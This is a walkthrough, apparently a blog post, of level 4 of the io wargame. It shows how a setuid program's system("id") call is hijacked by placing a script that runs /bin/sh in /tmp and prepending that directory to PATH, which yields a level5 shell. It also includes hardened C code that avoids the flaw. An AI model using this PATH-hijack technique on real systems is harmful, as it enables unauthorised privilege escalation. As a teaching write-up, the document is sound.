2010
05.03

Welcome to level 4. In my opinion, this one is easier than the previous levels if you know how the OS looks up executables. You have been given both the executable and the source code again. When we first run the program, the following result is shown.

level4@io:/levels$ ./level4
uid=1004(level4) gid=1004(level4) euid=1005(level5) groups=1004(level4),1029(nosu)

It looks like it is running the id command.

The id command lists the real and effective user IDs and the group IDs of the user associated with the current process. This is the counterpart to the $UID, $EUID, and $GROUPS internal Bash variables. The id command shows the effective IDs only when they differ from the real ones. – From webtools.live2support.com

You can confirm this by looking at the source code. And yes, it does have the statement

system("id");

which hands the command to the shell, and the shell decides which "id" gets run.

If you are familiar enough with this command, you know it is actually just an executable, usually located in /bin/. But why can you run it by typing just "id" rather than "/bin/id"? Because the OS has an environment variable for that. On *nix systems it is PATH; run echo $PATH to see its current value.

level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

So what we are going to do at this level is:

  1. Create a piece of code or a script that calls "/bin/sh"
  2. Redirect the "id" command to run your script
  3. Execute the level4 executable

Why does this work? Because the level4 executable has euid = level5 (see the definition of euid above). If we bring up a shell from this executable, the shell automatically has level5 permissions. Amazing enough?
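
As an added example (not the level's own source), here is what the hardened counterpart of the vulnerable `system("id")` looks like in C: a check that refuses a PATH containing relative, missing or world-writable entries, and a runner that executes /bin/id by absolute path with a fixed environment so the caller's PATH is never consulted. The function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* A PATH entry a privileged program must not trust: empty or relative entries
   (resolved against the caller's cwd), missing directories, and world-writable
   directories such as /tmp, where any user can drop a file named "id". */
int path_entry_is_trusted(const char *entry) {
    struct stat st;
    if (entry == NULL || entry[0] != '/' || stat(entry, &st) != 0) return 0;
    return S_ISDIR(st.st_mode) && !(st.st_mode & S_IWOTH);
}

/* Walk a colon-separated PATH; returns 1 only if every entry is trusted.
   "::", a leading or a trailing ':' yield an empty entry, which is rejected. */
int path_is_trusted(const char *path) {
    char entry[4096];
    size_t n = 0;
    if (path == NULL || path[0] == '\0') return 0;
    for (;; path++) {
        if (*path == ':' || *path == '\0') {
            entry[n] = '\0';
            if (!path_entry_is_trusted(entry)) return 0;
            n = 0;
            if (*path == '\0') return 1;
        } else if (n < sizeof entry - 1) {
            entry[n++] = *path;
        }
    }
}

/* Hardened replacement for system("id"): no shell, absolute path, and a fixed
   environment. Returns the child's exit status, or -1 on failure. */
int run_id_hardened(void) {
    char *const argv[] = { "id", NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/bin/id", argv, envp);
        _exit(127);             /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With the PATH from this level, path_is_trusted("/tmp/onhacks:/usr/bin:/bin") returns 0, while run_id_hardened() still prints the real and effective IDs from /bin/id regardless of what the caller exported.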

Actually you can only create code or scripts under /tmp/. We can do the following to create a script there.

level4@io:/levels$ mkdir /tmp/onhacks/
level4@io:/levels$ echo "/bin/sh" > /tmp/onhacks/id
level4@io:/levels$ chmod +x /tmp/onhacks/id

The next step is to change the environment variable by running:

level4@io:/levels$ PATH=/tmp/onhacks:/usr/bin:/bin:/usr/games

Now you are ready to get access to the next level. Remember to grab the password for level 5. This level reminds us to use what we learn: even a little trick can open a big hole. Think creatively and diversely.

See you in level 5.

Note:

  1. Other option: you can replace the script with a piece of C code that executes execl("/bin/sh", "sh", (char *)NULL);
  2. Your changes to the environment variable will not affect others; they are scoped to the current session.
